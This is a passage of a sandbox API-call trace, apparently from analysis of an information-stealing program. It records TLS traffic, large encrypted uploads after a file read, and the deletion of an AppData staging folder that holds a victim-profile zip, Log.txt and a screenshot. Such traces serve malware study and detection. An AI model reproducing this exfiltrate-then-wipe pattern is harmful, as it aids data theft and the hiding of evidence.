(in: s=0x464, buf=0x2850e01, len=4, flags=0 | out: buf=0x2850e01*) returned 4 [0239.187] InitializeSecurityContextW (in: phCredential=0x615bb80, phContext=0x615bc0c, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2850e78, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x2850e8c, pfContextAttr=0x284dd6c, ptsExpiry=0x615bb78 | out: phNewContext=0x284f484, pOutput=0x2850e8c, pfContextAttr=0x284dd6c, ptsExpiry=0x615bb78) returned 0x90312 [0239.193] FreeContextBuffer (in: pvContextBuffer=0x7ec708 | out: pvContextBuffer=0x7ec708) returned 0x0 [0239.193] send (s=0x464, buf=0x2850f08*, len=166, flags=0) returned 166 [0239.194] recv (in: s=0x464, buf=0x2850f08, len=5, flags=0 | out: buf=0x2850f08*) returned 5 [0239.365] recv (in: s=0x464, buf=0x2850f0d, len=1, flags=0 | out: buf=0x2850f0d*) returned 1 [0239.365] InitializeSecurityContextW (in: phCredential=0x615bae8, phContext=0x615bb74, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2851034, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x2851048, pfContextAttr=0x284dd6c, ptsExpiry=0x615bae0 | out: phNewContext=0x284f484, pOutput=0x2851048, pfContextAttr=0x284dd6c, ptsExpiry=0x615bae0) returned 0x90312 [0239.365] recv (in: s=0x464, buf=0x28510d8, len=5, flags=0 | out: buf=0x28510d8*) returned 5 [0239.365] recv (in: s=0x464, buf=0x28510f1, len=80, flags=0 | out: buf=0x28510f1*) returned 80 [0239.366] InitializeSecurityContextW (in: phCredential=0x615ba50, phContext=0x615badc, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x28511b4, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x28511c8, pfContextAttr=0x284dd6c, ptsExpiry=0x615ba48 | out: phNewContext=0x284f484, pOutput=0x28511c8, pfContextAttr=0x284dd6c, ptsExpiry=0x615ba48) returned 0x0 [0239.625] QueryContextAttributesW (in: phContext=0x284f484, ulAttribute=0x4, pBuffer=0x2851274 | out: pBuffer=0x2851274) returned 0x0 [0239.627] QueryContextAttributesW (in: phContext=0x284f484, ulAttribute=0x5a, pBuffer=0x28512cc | out: pBuffer=0x28512cc) returned 0x0 [0239.631] QueryContextAttributesW (in: phContext=0x284f484, ulAttribute=0x53, pBuffer=0x2851580 | out: pBuffer=0x2851580) returned 0x0 [0239.639] CertDuplicateCRLContext (pCrlContext=0x4b74e50) returned 0x4b74e50 [0239.639] CertDuplicateStore (hCertStore=0x7b3340) returned 0x7b3340 [0239.640] CertEnumCertificatesInStore (hCertStore=0x7b3340, pPrevCertContext=0x0) returned 0x4b74ef0 [0239.640] CertDuplicateCRLContext (pCrlContext=0x4b74ef0) returned 0x4b74ef0 [0239.641] CertEnumCertificatesInStore (hCertStore=0x7b3340, pPrevCertContext=0x4b74ef0) returned 0x4b74ea0 [0239.641] CertDuplicateCRLContext (pCrlContext=0x4b74ea0) returned 0x4b74ea0 [0239.641] CertEnumCertificatesInStore (hCertStore=0x7b3340, pPrevCertContext=0x4b74ea0) returned 0x4b74e50 [0239.641] CertDuplicateCRLContext (pCrlContext=0x4b74e50) returned 0x4b74e50 [0239.641] CertEnumCertificatesInStore (hCertStore=0x7b3340, pPrevCertContext=0x4b74e50) returned 0x0 [0239.641] CertCloseStore (hCertStore=0x7b3340, dwFlags=0x0) returned 1 [0239.641] CertFreeCRLContext (pCrlContext=0x4b74e50) returned 1 [0239.662] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x7b33b8 [0239.663] CertAddCRLLinkToStore (in: hCertStore=0x7b33b8, pCrlContext=0x4b74ef0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0239.664] CertAddCRLLinkToStore (in: hCertStore=0x7b33b8, pCrlContext=0x4b74ea0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0239.664] CertAddCRLLinkToStore (in: hCertStore=0x7b33b8, pCrlContext=0x4b74e50, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0239.668] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x4b74e50, pTime=0x615ba5c, hAdditionalStore=0x7b33b8, pChainPara=0x615b99c, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x615b990 | out: ppChainContext=0x615b990) returned 1 [0240.252] CertDuplicateCertificateChain (pChainContext=0x4b89760) returned 0x4b89760 [0240.253] CertDuplicateCRLContext (pCrlContext=0x4b74e50) returned 0x4b74e50 [0240.253] CertDuplicateCRLContext (pCrlContext=0x64a97a0) returned 0x64a97a0 [0240.253] CertDuplicateCRLContext (pCrlContext=0x64a97f0) returned 0x64a97f0 [0240.253] CertFreeCertificateChain (pChainContext=0x4b89760) [0240.254] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x4b89760, pPolicyPara=0x615bb3c, pPolicyStatus=0x615bb28 | out: pPolicyStatus=0x615bb28) returned 1 [0240.255] SetLastError (dwErrCode=0x0) [0240.257] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x4b89760, pPolicyPara=0x615bba8, pPolicyStatus=0x615bb50 | out: pPolicyStatus=0x615bb50) returned 1 [0240.260] CertFreeCertificateChain (pChainContext=0x4b89760) [0240.260] CertFreeCRLContext (pCrlContext=0x4b74e50) returned 1 [0240.263] CoTaskMemAlloc (cb=0x20c) returned 0x7fb0a0 [0240.263] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x7fb0a0, nSize=0x104 | out: lpBuffer="̾\x01舏൒ܿ霜⮩렎┹ࠄ온售홟抺훩ལ萞쥗ᗡﱧ碷?膲䩐♆鏔О姺╇듰ᩌ⹃塂০健⾱瑣㻽咨ὗ鹐垇駧䓴ꥄ彀뽁⛐볉䴗紜鈎鈶᩿䥘䧘琉㕕¿㬭갣￞䲳苓챛᎝롧菌帖֩镼ቌ黫?㤏㾤뢱춄█曏躵鍢訉?௟ꥉዚ䇗峛氵崺꟫紷곓ᤓ吰솓쐍喉董簲넩ꕦ縎䏥侀湇混欳┦࿳༛큩︌㵖诮镧典錻껌೟쓇鏞豠읫乩ﹴ?可㋃䏳遳匷钾惷鬳䙓Ŏ䓧昁㭨깾∴쩿‽뒷岚誷까㩍?Ⲷ㶷컹럿坚㔟֖ﺯ鹌?쳰㫨쁐砃풛暱?牧曈ꚧ踵뵑鴘6沜ﹾ밳吿蘔凋䘈ᅧ准퓤ᾎᑻ︓㲼逢ᡪꌆ?扤釔ᢴ瓉ाₐ濐⮑ꤻ盲䊶ꍣ綝ꚽ둟㨙욼?⭇⠑笷뇖쇜ꧬ창覟?搉भ⁍荡교퍌촧盭圍킬ࢳ쏛㘎攗耒") returned 0x0 [0240.263] CoTaskMemFree (pv=0x7fb0a0) [0240.263] CoTaskMemAlloc (cb=0x20c) returned 0x7fb0a0 [0240.263] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x7fb0a0, nSize=0x104 | out: lpBuffer="̾\x01舏൒ܿ霜⮩렎┹ࠄ온售홟抺훩ལ萞쥗ᗡﱧ碷?膲䩐♆鏔О姺╇듰ᩌ⹃塂০健⾱瑣㻽咨ὗ鹐垇駧䓴ꥄ彀뽁⛐볉䴗紜鈎鈶᩿䥘䧘琉㕕¿㬭갣￞䲳苓챛᎝롧菌帖֩镼ቌ黫?㤏㾤뢱춄█曏躵鍢訉?௟ꥉዚ䇗峛氵崺꟫紷곓ᤓ吰솓쐍喉董簲넩ꕦ縎䏥侀湇混欳┦࿳༛큩︌㵖诮镧典錻껌೟쓇鏞豠읫乩ﹴ?可㋃䏳遳匷钾惷鬳䙓Ŏ䓧昁㭨깾∴쩿‽뒷岚誷까㩍?Ⲷ㶷컹럿坚㔟֖ﺯ鹌?쳰㫨쁐砃풛暱?牧曈ꚧ踵뵑鴘6沜ﹾ밳吿蘔凋䘈ᅧ准퓤ᾎᑻ︓㲼逢ᡪꌆ?扤釔ᢴ瓉ाₐ濐⮑ꤻ盲䊶ꍣ綝ꚽ둟㨙욼?⭇⠑笷뇖쇜ꧬ창覟?搉भ⁍荡교퍌촧盭圍킬ࢳ쏛㘎攗耒") returned 0x0 [0240.263] CoTaskMemFree (pv=0x7fb0a0) [0240.263] CoTaskMemAlloc (cb=0x20c) returned 0x7fb0a0 [0240.263] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x7fb0a0, nSize=0x104 | out: lpBuffer="̾\x01舏൒ܿ霜⮩렎┹ࠄ온售홟抺훩ལ萞쥗ᗡﱧ碷?膲䩐♆鏔О姺╇듰ᩌ⹃塂০健⾱瑣㻽咨ὗ鹐垇駧䓴ꥄ彀뽁⛐볉䴗紜鈎鈶᩿䥘䧘琉㕕¿㬭갣￞䲳苓챛᎝롧菌帖֩镼ቌ黫?㤏㾤뢱춄█曏躵鍢訉?௟ꥉዚ䇗峛氵崺꟫紷곓ᤓ吰솓쐍喉董簲넩ꕦ縎䏥侀湇混欳┦࿳༛큩︌㵖诮镧典錻껌೟쓇鏞豠읫乩ﹴ?可㋃䏳遳匷钾惷鬳䙓Ŏ䓧昁㭨깾∴쩿‽뒷岚誷까㩍?Ⲷ㶷컹럿坚㔟֖ﺯ鹌?쳰㫨쁐砃풛暱?牧曈ꚧ踵뵑鴘6沜ﹾ밳吿蘔凋䘈ᅧ准퓤ᾎᑻ︓㲼逢ᡪꌆ?扤釔ᢴ瓉ाₐ濐⮑ꤻ盲䊶ꍣ綝ꚽ둟㨙욼?⭇⠑笷뇖쇜ꧬ창覟?搉भ⁍荡교퍌촧盭圍킬ࢳ쏛㘎攗耒") returned 0x0 [0240.263] CoTaskMemFree (pv=0x7fb0a0) [0240.263] CoTaskMemAlloc (cb=0x20c) returned 0x7fb0a0 [0240.263] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x7fb0a0, nSize=0x104 | out: lpBuffer="̾\x01舏൒ܿ霜⮩렎┹ࠄ온售홟抺훩ལ萞쥗ᗡﱧ碷?膲䩐♆鏔О姺╇듰ᩌ⹃塂০健⾱瑣㻽咨ὗ鹐垇駧䓴ꥄ彀뽁⛐볉䴗紜鈎鈶᩿䥘䧘琉㕕¿㬭갣￞䲳苓챛᎝롧菌帖֩镼ቌ黫?㤏㾤뢱춄█曏躵鍢訉?௟ꥉዚ䇗峛氵崺꟫紷곓ᤓ吰솓쐍喉董簲넩ꕦ縎䏥侀湇混欳┦࿳༛큩︌㵖诮镧典錻껌೟쓇鏞豠읫乩ﹴ?可㋃䏳遳匷钾惷鬳䙓Ŏ䓧昁㭨깾∴쩿‽뒷岚誷까㩍?Ⲷ㶷컹럿坚㔟֖ﺯ鹌?쳰㫨쁐砃풛暱?牧曈ꚧ踵뵑鴘6沜ﹾ밳吿蘔凋䘈ᅧ准퓤ᾎᑻ︓㲼逢ᡪꌆ?扤釔ᢴ瓉ाₐ濐⮑ꤻ盲䊶ꍣ綝ꚽ둟㨙욼?⭇⠑笷뇖쇜ꧬ창覟?搉भ⁍荡교퍌촧盭圍킬ࢳ쏛㘎攗耒") returned 0x0 [0240.263] CoTaskMemFree (pv=0x7fb0a0) [0240.264] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x2859a9c, MessageSeqNo=0x0 | out: pMessage=0x2859a9c) returned 0x0 [0240.267] send (s=0x464, buf=0x2858574*, len=69, flags=0) returned 69 [0240.270] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0240.435] recv (in: s=0x464, buf=0x2865eb1, len=192, flags=0 | out: buf=0x2865eb1*) returned 192 [0240.436] DecryptMessage (in: phContext=0x284f484, pMessage=0x2869f6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2869f6c, pfQOP=0x0) returned 0x0 [0240.474] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286aa8c, MessageSeqNo=0x0 | out: pMessage=0x286aa8c) returned 0x0 [0240.474] send (s=0x464, buf=0x2858574*, len=117, flags=0) returned 117 [0240.475] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0240.647] recv (in: s=0x464, buf=0x2865eb1, len=80, flags=0 | out: buf=0x2865eb1*) returned 80 [0240.647] DecryptMessage (in: phContext=0x284f484, pMessage=0x286ac0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x286ac0c, pfQOP=0x0) returned 0x0 [0240.649] SysStringLen (param_1="盓ࠚǗ徖⻇퍊琣姥鹣ꌈ픾␆혽") returned 0x10 [0240.649] SystemFunction041 (in: Memory=0x7f6d14, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x7f6d14) returned 0x0 [0240.649] SysStringLen (param_1=")||LHNUQ5wgcszg") returned 0x10 [0240.649] SystemFunction040 (in: Memory=0x7f6d14, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x7f6d14) returned 0x0 [0240.649] SysStringLen (param_1=")||LHNUQ5wgcszg") returned 0xf [0240.649] SysStringLen (param_1=")||LHNUQ5wgcszg") returned 0xf [0240.649] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286ae4c, MessageSeqNo=0x0 | out: pMessage=0x286ae4c) returned 0x0 [0240.649] send (s=0x464, buf=0x2858574*, len=85, flags=0) returned 85 [0240.650] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0240.819] recv (in: s=0x464, buf=0x2865eb1, len=96, flags=0 | out: buf=0x2865eb1*) returned 96 [0240.819] DecryptMessage (in: phContext=0x284f484, pMessage=0x286afcc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x286afcc, pfQOP=0x0) returned 0x0 [0240.821] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286b550, MessageSeqNo=0x0 | out: pMessage=0x286b550) returned 0x0 [0240.821] send (s=0x464, buf=0x2858574*, len=101, flags=0) returned 101 [0240.822] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0240.994] recv (in: s=0x464, buf=0x2865eb1, len=64, flags=0 | out: buf=0x2865eb1*) returned 64 [0240.995] DecryptMessage (in: phContext=0x284f484, pMessage=0x286b6d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x286b6d0, pfQOP=0x0) returned 0x0 [0240.995] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286b9ac, MessageSeqNo=0x0 | out: pMessage=0x286b9ac) returned 0x0 [0240.995] send (s=0x464, buf=0x2858574*, len=101, flags=0) returned 101 [0240.995] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0241.212] recv (in: s=0x464, buf=0x2865eb1, len=64, flags=0 | out: buf=0x2865eb1*) returned 64 [0241.213] DecryptMessage (in: phContext=0x284f484, pMessage=0x286bb2c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x286bb2c, pfQOP=0x0) returned 0x0 [0241.213] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286bcc4, MessageSeqNo=0x0 | out: pMessage=0x286bcc4) returned 0x0 [0241.213] send (s=0x464, buf=0x2858574*, len=69, flags=0) returned 69 [0241.213] recv (in: s=0x464, buf=0x2865eac, len=5, flags=0 | out: buf=0x2865eac*) returned 5 [0241.388] recv (in: s=0x464, buf=0x2865eb1, len=96, flags=0 | out: buf=0x2865eb1*) returned 96 [0241.388] DecryptMessage (in: phContext=0x284f484, pMessage=0x286be44, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x286be44, pfQOP=0x0) returned 0x0 [0241.402] CoCreateGuid (in: pguid=0x615c104 | out: pguid=0x615c104*(Data1=0x68c42dac, Data2=0x4a9e, Data3=0x4aae, Data4=([0]=0xba, [1]=0xf6, [2]=0x48, [3]=0x15, [4]=0x32, [5]=0x15, [6]=0x2d, [7]=0x4d))) returned 0x0 [0241.413] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x286e010, MessageSeqNo=0x0 | out: pMessage=0x286e010) returned 0x0 [0241.414] send (s=0x464, buf=0x2858574*, len=325, flags=0) returned 325 [0241.455] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x2872de4, MessageSeqNo=0x0 | out: pMessage=0x2872de4) returned 0x0 [0241.455] send (s=0x464, buf=0x2858574*, len=213, flags=0) returned 213 [0241.457] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x28734c0, MessageSeqNo=0x0 | out: pMessage=0x28734c0) returned 0x0 [0241.457] send (s=0x464, buf=0x2858574*, len=69, flags=0) returned 69 [0241.458] EncryptMessage (in: phContext=0x284f484, fQOP=0x0, pMessage=0x2878430, MessageSeqNo=0x0 | out: pMessage=0x2878430) returned 0x0 [0241.458] send (s=0x464, buf=0x2858574*, len=293, flags=0) returned 293 [0241.458] ReadFile (in: hFile=0x470, lpBuffer=0x2873558, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x615c124, lpOverlapped=0x0 | out: lpBuffer=0x2873558*, lpNumberOfBytesRead=0x615c124*=0x4400, lpOverlapped=0x0) returned 1 [0241.464] ReadFile (in: hFile=0x470, lpBuffer=0x2873558, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x615c124, lpOverlapped=0x0 | out: lpBuffer=0x2873558*, lpNumberOfBytesRead=0x615c124*=0x4400, lpOverlapped=0x0) returned 1 [0241.465] ReadFile (in: hFile=0x470, lpBuffer=0x2873558, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x615c124, lpOverlapped=0x0 | out: lpBuffer=0x2873558*, lpNumberOfBytesRead=0x615c124*=0x1b2f, lpOverlapped=0x0) returned 1 [0241.465] ReadFile (in: hFile=0x470, lpBuffer=0x2873558, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x615c124, lpOverlapped=0x0 | out: lpBuffer=0x2873558*, lpNumberOfBytesRead=0x615c124*=0x0, lpOverlapped=0x0) returned 1 [0241.525] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a1e8, MessageSeqNo=0x0 | out: pMessage=0x270a1e8) returned 0x0 [0241.525] send (s=0x464, buf=0x2706154*, len=16373, flags=0) returned 16373 [0241.525] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a2fc, MessageSeqNo=0x0 | out: pMessage=0x270a2fc) returned 0x0 [0241.526] send (s=0x464, buf=0x2706154*, len=16373, flags=0) returned 16373 [0241.585] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a410, MessageSeqNo=0x0 | out: pMessage=0x270a410) returned 0x0 [0241.585] send (s=0x464, buf=0x2706154*, len=16373, flags=0) returned 16373 [0241.633] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a524, MessageSeqNo=0x0 | out: pMessage=0x270a524) returned 0x0 [0241.633] send (s=0x464, buf=0x2706154*, len=8453, flags=0) returned 8453 [0241.637] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a664, MessageSeqNo=0x0 | out: pMessage=0x270a664) returned 0x0 [0241.637] send (s=0x464, buf=0x26d2bc4*, len=117, flags=0) returned 117 [0242.105] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a784, MessageSeqNo=0x0 | out: pMessage=0x270a784) returned 0x0 [0242.105] send (s=0x464, buf=0x26d2bc4*, len=69, flags=0) returned 69 [0242.211] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270a8a4, MessageSeqNo=0x0 | out: pMessage=0x270a8a4) returned 0x0 [0242.211] send (s=0x464, buf=0x26d2bc4*, len=69, flags=0) returned 69 [0242.277] recv (in: s=0x464, buf=0x26e037c, len=5, flags=0 | out: buf=0x26e037c*) returned 5 [0242.391] recv (in: s=0x464, buf=0x26e0381, len=96, flags=0 | out: buf=0x26e0381*) returned 96 [0242.391] DecryptMessage (in: phContext=0x26cd5a4, pMessage=0x270aa24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x270aa24, pfQOP=0x0) returned 0x0 [0242.395] ReleaseSemaphore (in: hSemaphore=0x47c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0242.396] EncryptMessage (in: phContext=0x26cd5a4, fQOP=0x0, pMessage=0x270ad8c, MessageSeqNo=0x0 | out: pMessage=0x270ad8c) returned 0x0 [0242.396] send (s=0x464, buf=0x26d2bc4*, len=69, flags=0) returned 69 [0242.397] recv (in: s=0x464, buf=0x26e037c, len=5, flags=0 | out: buf=0x26e037c*) returned 5 [0242.566] recv (in: s=0x464, buf=0x26e0381, len=64, flags=0 | out: buf=0x26e0381*) returned 64 [0242.566] DecryptMessage (in: phContext=0x26cd5a4, pMessage=0x270aefc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x270aefc, pfQOP=0x0) returned 0x0 [0242.567] QueryContextAttributesW (in: phContext=0x26cd5a4, ulAttribute=0x1a, pBuffer=0x615c114 | out: pBuffer=0x615c114) returned 0x0 [0242.570] DeleteSecurityContext (phContext=0x26cd5a4) returned 0x0 [0242.571] shutdown (s=0x464, how=2) returned 0 [0242.571] closesocket (s=0x464) returned 0 [0242.573] CloseHandle (hObject=0x470) returned 1 [0242.575] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) returned 0x0 [0244.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615db50) returned 1 [0244.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x615dbd0 | out: lpFileInformation=0x615dbd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xecaff150, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xecaff150, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0244.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615db4c) returned 1 [0244.577] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\*", lpFindFileData=0x615d8a4 | out: lpFindFileData=0x615d8a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xecaff150, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xecaff150, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x64bcf00 [0244.577] FindNextFileW (in: hFindFile=0x64bcf00, lpFindFileData=0x615d8b8 | out: lpFindFileData=0x615d8b8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe59c7af0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xecaff150, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xecaff150, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0244.577] FindNextFileW (in: hFindFile=0x64bcf00, lpFindFileData=0x615d8b8 | out: lpFindFileData=0x615d8b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeca1a910, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeca1a910, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xecaff150, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xa32f, dwReserved0=0x0, dwReserved1=0x0, cFileName="aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", cAlternateFileName="AETADZ~1.ZIP")) returned 1 [0244.578] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip")) returned 1 [0244.579] FindNextFileW (in: hFindFile=0x64bcf00, lpFindFileData=0x615d8b8 | out: lpFindFileData=0x615d8b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549, dwReserved0=0x0, dwReserved1=0x0, cFileName="Log.txt", cAlternateFileName="")) returned 1 [0244.579] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt")) returned 1 [0244.580] FindNextFileW (in: hFindFile=0x64bcf00, lpFindFileData=0x615d8b8 | out: lpFindFileData=0x615d8b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Screenshot.jpeg", cAlternateFileName="SCREEN~1.JPE")) returned 1 [0244.580] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg")) returned 1 [0244.581] FindNextFileW (in: hFindFile=0x64bcf00, lpFindFileData=0x615d8b8 | out: lpFindFileData=0x615d8b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Screenshot.jpeg", cAlternateFileName="SCREEN~1.JPE")) returned 0 [0244.581] FindClose (in: hFindFile=0x64bcf00 | out: hFindFile=0x64bcf00) returned 1 [0244.581] RemoveDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933")) returned 1 [0244.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.632] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.639] SleepEx 